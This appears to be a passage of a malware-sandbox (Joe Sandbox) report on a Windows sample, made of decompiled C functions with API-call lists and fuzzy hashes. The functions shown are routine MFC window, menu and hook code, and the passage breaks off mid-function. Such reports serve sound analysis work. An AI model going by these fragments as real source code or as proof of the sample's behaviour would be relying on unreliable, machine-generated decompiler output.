                  				_t70 = _t29;
                  				if(_t29 != 0) {
                  					E0041B29E(_t66 + 0xc4,  *(_t68 + 8), 0, 0xa);
                  				}
                  				E00411F96(_t46, _t52, _t63, _t66, _t70, 8);
                  				_t31 = E00408C1D(_t46, _t66, _t70,  *((intOrPtr*)(_t68 + 0xc)), _t63);
                  				E00405562(_t68 - 0x10, _t70, _t66 + 0xc4);
                  				_push( *((intOrPtr*)(_t68 + 0x14)));
                  				_push(0);
                  				_t64 = _t63 & 0x0000ffff;
                  				_push(_t63 & 0x0000ffff);
                  				_push( *((intOrPtr*)(_t68 + 0x10)));
                  				_push(0x46279c);
                  				_push( *((intOrPtr*)(_t68 + 0xc)));
                  				 *(_t68 - 4) = 1;
                  				_push( *((intOrPtr*)(_t68 - 0x10)));
                  				_push(_t31); // executed
                  				if( *((intOrPtr*)( *_t66 + 0x13c))() != 0) {
                  					__eflags =  *((intOrPtr*)(_t66 + 0xd4)) - 1;
                  					if(__eflags != 0) {
                  						_t36 =  *(_t66 + 0xd8);
                  					} else {
                  						_t36 = GetMenu( *(_t66 + 0x20));
                  					}
                  					_t56 = _t66;
                  					 *(_t66 + 0x5c) = _t36;
                  					E00408862(_t66, __eflags, _t64);
                  					__eflags =  *((intOrPtr*)(_t68 + 0x14));
                  					if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                  						E0040F918(1, _t56,  *(_t66 + 0x20), 0x364, 0, 0, 1, 1); // executed
                  					}
                  					_t67 = 1;
                  					goto L4;
                  				} else {
                  					_t67 = 0;
                  					L4:
                  					E004010B0( *((intOrPtr*)(_t68 - 0x10)) + 0xfffffff0, _t61);
                  					E004010B0( *(_t68 + 8) + 0xfffffff0, _t61);
                  					return E00431B73(_t67);
                  				}
                  			}











                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 3ada004b77250bfa2beb3bb5427139b91e0f2ee021aaa62671b01238db59777b
                  • Instruction ID: eeb843b551fa435bf3fec831ef0401d74a3c4f4e1e69e6eff3f7a39c04ab7661
                  • Opcode Fuzzy Hash: 3ada004b77250bfa2beb3bb5427139b91e0f2ee021aaa62671b01238db59777b
                  • Instruction Fuzzy Hash: EE21A071600304AFDB20AF71CC41FAF77B9AF44309F00452EBA56672E1DB789950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0040AF79(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
                  				struct HMENU__* _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t28;
                  				intOrPtr* _t30;
                  				intOrPtr _t33;
                  				intOrPtr _t35;
                  				struct HMENU__* _t39;
                  				void* _t42;
                  				intOrPtr _t48;
                  				intOrPtr _t51;
                  				intOrPtr* _t57;
                  
                  				_t42 = __ebx;
                  				_push(__ecx);
                  				_t57 = __ecx;
                  				_v8 = 0;
                  				_t59 = _a24;
                  				if(_a24 == 0) {
                  					L4:
                  					E00402CA0(_t57 + 0xc4, _t57, _a8);
                  					_t28 = _a20;
                  					__eflags = _t28;
                  					if(_t28 != 0) {
                  						_a24 =  *((intOrPtr*)(_t28 + 0x20));
                  					} else {
                  						_a24 = 0;
                  					}
                  					_t30 = _a16;
                  					_t48 =  *((intOrPtr*)(_t30 + 4));
                  					_t51 =  *_t30;
                  					_t33 =  *((intOrPtr*)( *_t57 + 0x5c))(_a28, _a4, _a8, _a12, _t51, _t48,  *((intOrPtr*)(_t30 + 8)) - _t51,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
                  					__eflags = _t33;
                  					if(_t33 != 0) {
                  						_t35 = 1;
                  						__eflags = 1;
                  						goto L11;
                  					} else {
                  						__eflags = _v8 - _t33;
                  						if(_v8 != _t33) {
                  							DestroyMenu(_v8);
                  						}
                  						L3:
                  						_t35 = 0;
                  						L11:
                  						return _t35;
                  					}
                  				}
                  				_t39 = LoadMenuA( *(E0041F363(__ebx, 0, __ecx, _t59) + 0xc), _a24);
                  				_v8 = _t39;
                  				if(_t39 != 0) {
                  					goto L4;
                  				}
                  				 *((intOrPtr*)( *_t57 + 0x11c))();
                  				goto L3;
                  			}

















                  APIs
                  • LoadMenuA.USER32 ref: 0040AF99
                  • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 0040B014
                  Similarity
                  • API ID: Menu$DestroyLoad
                  • String ID:
                  • API String ID: 588275208-0
                  • Opcode ID: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction ID: 118bc1eea92f049343cb41fc0e01d682e6849735effaaea45bedc3916b800edf
                  • Opcode Fuzzy Hash: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction Fuzzy Hash: F52168B521020AEFCF11CF65C9488AABBB5FF88354B108466F815A7261D738DD21DF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00426D44(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t32;
                  				void* _t40;
                  				void* _t52;
                  				signed int _t54;
                  				void* _t56;
                  				void* _t57;
                  				void* _t58;
                  				void* _t59;
                  
                  				_t59 = __eflags;
                  				_t52 = __edx;
                  				_t44 = __ebx;
                  				_push(0x10);
                  				E00431A9B(E0044C2F5, __ebx, __edi, __esi);
                  				_t56 = __ecx;
                  				 *(_t57 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa;
                  				 *(_t57 - 0x10) = E00404461(_t59,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa);
                  				_t32 = E0041F363(__ebx, __edi, _t56, _t59);
                  				_t54 = 0;
                  				 *((intOrPtr*)(_t57 - 0x18)) =  *((intOrPtr*)(_t32 + 4));
                  				if( *((intOrPtr*)(_t56 + 4)) > 0) {
                  					do {
                  						_t9 = _t54 + 1; // 0x1
                  						_t44 = _t9;
                  						swprintf( *(_t57 - 0x10),  *(_t57 - 0x14),  *(_t56 + 0x10), _t44);
                  						_t58 = _t58 + 0x10;
                  						_t40 = E00426700( *((intOrPtr*)(_t57 - 0x18)), _t57 - 0x1c,  *((intOrPtr*)(_t56 + 0xc)),  *(_t57 - 0x10), 0x44f0f5); // executed
                  						 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
                  						E004057D4( *((intOrPtr*)(_t56 + 8)) + _t54 * 4, _t40);
                  						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
                  						E004010B0( *((intOrPtr*)(_t57 - 0x1c)) + 0xfffffff0, _t52);
                  						_t54 = _t44;
                  						_t61 = _t54 -  *((intOrPtr*)(_t56 + 4));
                  					} while (_t54 <  *((intOrPtr*)(_t56 + 4)));
                  				}
                  				return E00431B73(E00404490(_t44, _t54, _t56, _t61,  *(_t57 - 0x10)));
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426D4B
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • swprintf.LIBCMT ref: 00426D88
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_l_mallocswprintf
                  • String ID:
                  • API String ID: 367293577-0
                  • Opcode ID: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction ID: 9573cca5b79f8fc0a76bfd734ff5aaffca9d9069506fe4030a5ee5cff69ba3c8
                  • Opcode Fuzzy Hash: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction Fuzzy Hash: B711A371D0060A9FCB10EFA5C882E6FB3F5FF44318F10492EF121A72A1CB38A9408B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E004292E7(intOrPtr __ebx, intOrPtr __edx, struct HINSTANCE__* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				char _v268;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t8;
                  				long _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				intOrPtr _t26;
                  				intOrPtr _t29;
                  				intOrPtr _t32;
                  				signed int _t36;
                  
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				_t34 = _t36;
                  				_t8 =  *0x463404; // 0x38a11573
                  				_v8 = _t8 ^ _t36;
                  				_t28 = _a8;
                  				GetModuleFileNameA(_a4,  &_v268, 0x104);
                  				_t14 = GetShortPathNameA( &_v268, E004014F0(_a8, 0x104), 0x104); // executed
                  				if(_t14 == 0) {
                  					E00402830(_t26, _t28,  &_v268);
                  				}
                  				_t15 = E0040A356(_t28, 0xffffffff);
                  				_pop(_t29);
                  				_pop(_t32);
                  				return E00430650(_t15, _t19, _v8 ^ _t34, _t26, _t29, _t32);
                  			}
















                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                  • GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  Similarity
                  • API ID: Name$FileModulePathShort
                  • String ID:
                  • API String ID: 4073693819-0
                  • Opcode ID: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction ID: 8e1aa580d8501399bd92b9dd3bfa18adfe58bb0007ac89ee96572330ca29169d
                  • Opcode Fuzzy Hash: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction Fuzzy Hash: FCF0A4766000146BCB10EFAADC45DEFB7ADEF99324F04416AF845E32C1DF78AA418B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00410F0D(void* __eflags, intOrPtr _a4) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HHOOK__* _t6;
                  				void* _t8;
                  				void* _t10;
                  				intOrPtr _t11;
                  				void* _t12;
                  				struct HHOOK__* _t13;
                  
                  				_t6 = E00420AEC(_t8, 0x466508, _t10, _t12, __eflags, 0x406452);
                  				_t13 = _t6;
                  				_t15 = _t13;
                  				if(_t13 == 0) {
                  					_t6 = E00406436(_t8, 0x466508, _t10, _t13, _t15);
                  				}
                  				_t11 = _a4;
                  				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
                  					return _t6;
                  				} else {
                  					if( *(_t13 + 0x28) == 0) {
                  						_t6 = SetWindowsHookExA(5, E00410CBA, 0, GetCurrentThreadId()); // executed
                  						 *(_t13 + 0x28) = _t6;
                  						_t18 = _t6;
                  						if(_t6 == 0) {
                  							_t6 = E004063FE(_t8, 0x466508, _t11, _t13, _t18);
                  						}
                  					}
                  					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
                  					return _t6;
                  				}
                  			}













                  APIs
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • GetCurrentThreadId.KERNEL32 ref: 00410F3C
                  • SetWindowsHookExA.USER32 ref: 00410F4C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Similarity
                  • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                  • String ID:
                  • API String ID: 1415497866-0
                  • Opcode ID: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction ID: 6c588268bc8433113d32a2b5924d2362cc050002e169fed3ae89e1c569c52b8e
                  • Opcode Fuzzy Hash: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction Fuzzy Hash: 9CF0273260071077C7302F67A806B577798EBC0B61F11013FFA0656280D6F8D8C1C6AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040CCC8(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
                  				_Unknown_base(*)()* _t11;
                  				long _t12;
                  				intOrPtr* _t17;
                  
                  				_t17 = __ecx;
                  				_t11 =  *(__ecx + 0x40);
                  				if(_t11 != 0) {
                  					L3:
                  					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
                  					return _t12;
                  				}
                  				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf8))());
                  				if(_t11 != 0) {
                  					goto L3;
                  				}
                  				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
                  			}







                  APIs
                  • DefWindowProcA.USER32(?,?,?,?), ref: 0040CCF1
                  • CallWindowProcA.USER32 ref: 0040CD06
                  Similarity
                  • API ID: ProcWindow$Call
                  • String ID:
                  • API String ID: 2316559721-0
                  • Opcode ID: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction ID: a59e30d0e50e3c6695c8649c18ee593f55ddf464080dc148df40e0021e8dadaa
                  • Opcode Fuzzy Hash: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction Fuzzy Hash: 8CF0F836100205FFDF115FA5DC48DAA7FB9FF08350B148529FA5996120E732D820AB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00413276(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				void* _t22;
                  				void* _t23;
                  
                  				_push(0);
                  				E00431A9B(E0044B200, __ebx, __edi, __esi);
                  				_t22 = __ecx;
                  				_t25 =  *((intOrPtr*)(__ecx + 0x94));
                  				_t13 =  *((intOrPtr*)(_t23 + 8));
                  				 *((intOrPtr*)(__ecx + 0x88)) =  *((intOrPtr*)(_t23 + 8));
                  				if( *((intOrPtr*)(__ecx + 0x94)) == 0) {
                  					_t15 = E00404461(_t25, 0xb0); // executed
                  					_t19 = _t15;
                  					 *((intOrPtr*)(_t23 + 8)) = _t19;
                  					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                  					if(_t19 == 0) {
                  						_t13 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t13 = E0042519C(_t19, _t22);
                  					}
                  					 *((intOrPtr*)(_t22 + 0x94)) = _t13;
                  				}
                  				if( *((intOrPtr*)(_t22 + 0x38)) == 0) {
                  					 *((intOrPtr*)(_t22 + 0x38)) = GetParent( *(_t22 + 0x20));
                  				}
                  				return E00431B73(_t13);
                  			}








                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041327D
                  • GetParent.USER32(?), ref: 004132C7
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Similarity
                  • API ID: H_prolog3Parent_malloc
                  • String ID:
                  • API String ID: 4058389177-0
                  • Opcode ID: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction ID: 5fd53afc60951b9d1215e33b10396915e24fbcf05b250d538ea7ccb8a05cbf96
                  • Opcode Fuzzy Hash: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction Fuzzy Hash: 67F082305017149FEB60AF31C54579B76E0BF0431AF50847FE94A866A1DB7CA5848B4D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00407887(void* __ecx) {
                  				struct HINSTANCE__* _t11;
                  				signed int _t12;
                  				void* _t15;
                  
                  				_t15 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                  					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
                  					 *(_t15 + 4) = _t11;
                  					if(_t11 == 0) {
                  						_t12 = LoadLibraryA( *(_t15 + 0xc));
                  						 *(_t15 + 4) = _t12;
                  						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
                  					}
                  				}
                  				return  *(_t15 + 4);
                  			}







                  APIs
                  • GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                  • LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction ID: b2e4a917816264131c583018976e3fb6b99e390f365dd9a40fef115991fd453c
                  • Opcode Fuzzy Hash: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction Fuzzy Hash: A9E08C32901B01CFD7319F25E808A43BBE4BF04B20B10C83EE8AAD3A20E730E840CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E004161F7(void* __esi, void* __eflags) {
                  				void* _t3;
                  				void* _t4;
                  				struct HHOOK__* _t6;
                  				void* _t7;
                  				void* _t8;
                  
                  				_t3 = E0041F363(_t7, _t8, __esi, __eflags);
                  				_t13 =  *((char*)(_t3 + 0x14));
                  				if( *((char*)(_t3 + 0x14)) == 0) {
                  					_push(__esi);
                  					_t4 = E0041EDAB(_t7, _t8, __esi, _t13);
                  					_t6 = SetWindowsHookExA(0xffffffff, E0041605F, 0, GetCurrentThreadId()); // executed
                  					 *(_t4 + 0x2c) = _t6;
                  					return _t6;
                  				}
                  				return _t3;
                  			}









                  APIs
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction ID: 0d4e1b78ceb5744933d127dfd959b1211db20431d59c43cc5bd31d8bd1737379
                  • Opcode Fuzzy Hash: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction Fuzzy Hash: 88D0A7354043106ED7206B727C09B963F50BB86338F150A5EF921522D6C52C85C24F5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E004217B7(void* __ebx, intOrPtr* __ecx, void* __edi, signed int _a8) {
                  				intOrPtr* _v8;
                  				intOrPtr _v12;
                  				char _v16;
                  				struct tagRECT _v32;
                  				signed int _t74;
                  				signed char _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t88;
                  				intOrPtr* _t91;
                  				intOrPtr _t92;
                  				signed int _t96;
                  				signed int _t97;
                  				intOrPtr _t101;
                  				intOrPtr _t104;
                  				intOrPtr _t109;
                  				signed int _t110;
                  				struct HDWP__** _t112;
                  
                  				_t112 = _a8;
                  				_push(_t112);
                  				_v8 = __ecx;
                  				_t74 =  *((intOrPtr*)( *__ecx + 0x16c))();
                  				_a8 = _t74;
                  				if((_t74 & 0x10000000) == 0 || (_t74 & 0x0000f000) == 0) {
                  					L28:
                  					return 0;
                  				} else {
                  					CopyRect( &_v32, _t112 + 4);
                  					_t109 = _v32.right - _v32.left;
                  					_t88 = _v32.bottom - _v32.top;
                  					_t91 = _v8;
                  					_t79 =  *(_t91 + 0x84);
                  					_t96 = 0 |  *((intOrPtr*)(_t112 + 0x1c)) != 0x00000000;
                  					if((_t79 & 0x00000004) == 0 || (_t79 & 0x00000001) == 0) {
                  						if((_a8 & 0x0000a000) == 0) {
                  							_t97 = _t96 | 0x00000010;
                  						} else {
                  							_t97 = _t96 | 0x0000000a;
                  						}
                  					} else {
                  						_t97 = _t96 | 0x00000006;
                  					}
                  					 *((intOrPtr*)( *_t91 + 0x140))( &_v16, 0xffffffff, _t97);
                  					_t92 = _v16;
                  					if(_t92 >= _t109) {
                  						_t92 = _t109;
                  						_v16 = _t92;
                  					}
                  					_t82 = _v12;
                  					if(_t82 >= _t88) {
                  						_t82 = _t88;
                  						_v12 = _t82;
                  					}
                  					_t110 = _a8;
                  					if((_t110 & 0x0000a000) == 0) {
                  						if((_t110 & 0x00005000) != 0) {
                  							_t101 =  *((intOrPtr*)(_t112 + 0x18));
                  							 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t112 + 0x14)) + _t92;
                  							if(_t101 <= _t82) {
                  								_t101 = _t82;
                  							}
                  							 *((intOrPtr*)(_t112 + 0x18)) = _t101;
                  							if((_t110 & 0x00001000) == 0) {
                  								if((_t110 & 0x00004000) != 0) {
                  									 *((intOrPtr*)(_t112 + 0xc)) =  *((intOrPtr*)(_t112 + 0xc)) - _t92;
                  									_v32.left = _v32.right - _t92;
                  								}
                  							} else {
                  								 *(_t112 + 4) =  *(_t112 + 4) + _t92;
                  							}
                  						}
                  					} else {
                  						_t104 =  *((intOrPtr*)(_t112 + 0x14));
                  						 *((intOrPtr*)(_t112 + 0x18)) =  *((intOrPtr*)(_t112 + 0x18)) + _t82;
                  						if(_t104 <= _t92) {
                  							_t104 = _t92;
                  						}
                  						 *((intOrPtr*)(_t112 + 0x14)) = _t104;
                  						if((_t110 & 0x00002000) == 0) {
                  							if((_t110 & 0x00008000) != 0) {
                  								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t112 + 0x10)) - _t82;
                  								_v32.top = _v32.bottom - _t82;
                  							}
                  						} else {
                  							 *((intOrPtr*)(_t112 + 8)) =  *((intOrPtr*)(_t112 + 8)) + _t82;
                  						}
                  					}
                  					_v32.right = _v32.left + _t92;
                  					_v32.bottom = _v32.top + _t82;
                  					if( *_t112 != 0) {
                  						E0040CEE2(_t112,  *((intOrPtr*)(_v8 + 0x20)),  &_v32);
                  					}
                  					goto L28;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction ID: b6c8682c3a5f8d4b9bbb0fe91b9393bb500e1cc71d8d3095f72ca3a43206c229
                  • Opcode Fuzzy Hash: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction Fuzzy Hash: 44419A31E003159FCB28DFA9D484AAFB7F6BF94300F64852ED41693364E738A945CB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0041730A(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t38;
                  				signed int _t40;
                  				intOrPtr* _t49;
                  				signed int _t57;
                  				intOrPtr* _t84;
                  				void* _t85;
                  
                  				_push(4);
                  				E00431A9B(E0044B513, __ebx, __edi, __esi);
                  				_t82 = __ecx;
                  				_t38 =  *((intOrPtr*)( *__ecx + 0x6c))();
                  				_t84 = _t38;
                  				_t87 = _t84;
                  				if(_t84 != 0) {
                  					 *(_t84 + 0x4c) =  *(_t84 + 0x4c) & 0x00000000;
                  					_push(0);
                  					_push(_t84);
                  					_t40 =  *((intOrPtr*)( *__ecx + 0x70))();
                  					 *(_t85 - 0x10) = _t40;
                  					__eflags = _t40;
                  					if(__eflags != 0) {
                  						__eflags =  *(_t85 + 8);
                  						if(__eflags != 0) {
                  							E0040D6DD(0, _t85 + 0xb, __ecx, __eflags);
                  							 *(_t85 - 4) = 0;
                  							__eflags =  *((intOrPtr*)( *_t84 + 0x74))( *(_t85 + 8));
                  							if(__eflags != 0) {
                  								 *((intOrPtr*)( *_t84 + 0x54))( *(_t85 + 8), 1);
                  								_t29 = _t85 - 4;
                  								 *_t29 =  *(_t85 - 4) | 0xffffffff;
                  								__eflags =  *_t29;
                  								E004119E0(0, _t85 + 0xb, _t82, _t84,  *_t29);
                  								goto L14;
                  							} else {
                  								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
                  								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                  								E004119E0(0, _t85 + 0xb, _t82, _t84, __eflags);
                  								goto L2;
                  							}
                  						} else {
                  							_push(_t84);
                  							 *((intOrPtr*)( *__ecx + 0x84))();
                  							__eflags =  *(_t85 + 0xc);
                  							if( *(_t85 + 0xc) == 0) {
                  								 *((intOrPtr*)(_t84 + 0x50)) = 1;
                  							}
                  							_t57 =  *((intOrPtr*)( *_t84 + 0x70))();
                  							__eflags = _t57;
                  							if(_t57 != 0) {
                  								 *((intOrPtr*)(_t82 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x8c)) + 1;
                  								L14:
                  								 *((intOrPtr*)( *_t82 + 0x74))( *(_t85 - 0x10), _t84,  *(_t85 + 0xc));
                  								_t49 = _t84;
                  							} else {
                  								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
                  								goto L2;
                  							}
                  						}
                  					} else {
                  						E00417146(0, __edx, __ecx, _t84, __eflags);
                  						 *((intOrPtr*)( *_t84 + 4))(1, 0xf104, 0, 0xffffffff);
                  						goto L2;
                  					}
                  				} else {
                  					_push(0xffffffff);
                  					_push(_t38);
                  					_push(0xf104);
                  					E00417146(__ebx, __edx, __ecx, _t84, _t87);
                  					L2:
                  					_t49 = 0;
                  				}
                  				return E00431B73(_t49);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417311
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004119E0: __EH_prolog3_catch_GS.LIBCMT ref: 004119EA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$H_prolog3_catch_
                  • String ID:
                  • API String ID: 2899319929-0
                  • Opcode ID: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction ID: ffda74f464d4dc7f0a604a0d06fefe8caa514aab76a61e0630f1065df7d55a41
                  • Opcode Fuzzy Hash: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction Fuzzy Hash: 88316B30604219EFCB20AF64C885AAEB7B1BF04314F10455AFD628B3A1DB78D981DB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040F62D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t39;
                  				intOrPtr _t56;
                  				signed int _t58;
                  				signed int _t62;
                  				intOrPtr _t70;
                  				signed int _t76;
                  				void* _t78;
                  				void* _t82;
                  				intOrPtr _t83;
                  
                  				_t82 = __eflags;
                  				_push(0x38);
                  				E00431ACE(E0044B025, __ebx, __edi, __esi);
                  				_t56 = E00420AEC(__ebx, 0x466508, __edi, __esi, _t82, 0x406452);
                  				_t83 = _t56;
                  				 *((intOrPtr*)(_t78 - 0x18)) = _t56;
                  				_t84 = _t83 == 0;
                  				if(_t83 == 0) {
                  					E00406436(_t56, 0x466508, __edi, __esi, _t84);
                  				}
                  				_t4 = _t56 + 0x58; // 0x58
                  				_t58 = 7;
                  				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
                  				_t70 =  *((intOrPtr*)(_t78 + 0x10));
                  				_t76 =  *(_t78 + 8);
                  				 *_t39 =  *(_t78 + 0xc);
                  				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
                  				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
                  				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
                  				 *((intOrPtr*)(_t78 - 4)) = 0;
                  				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
                  				}
                  				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                  				if(_t70 == 0x110) {
                  					E0040D7C1(_t76, _t78 - 0x28, _t78 + 8);
                  				}
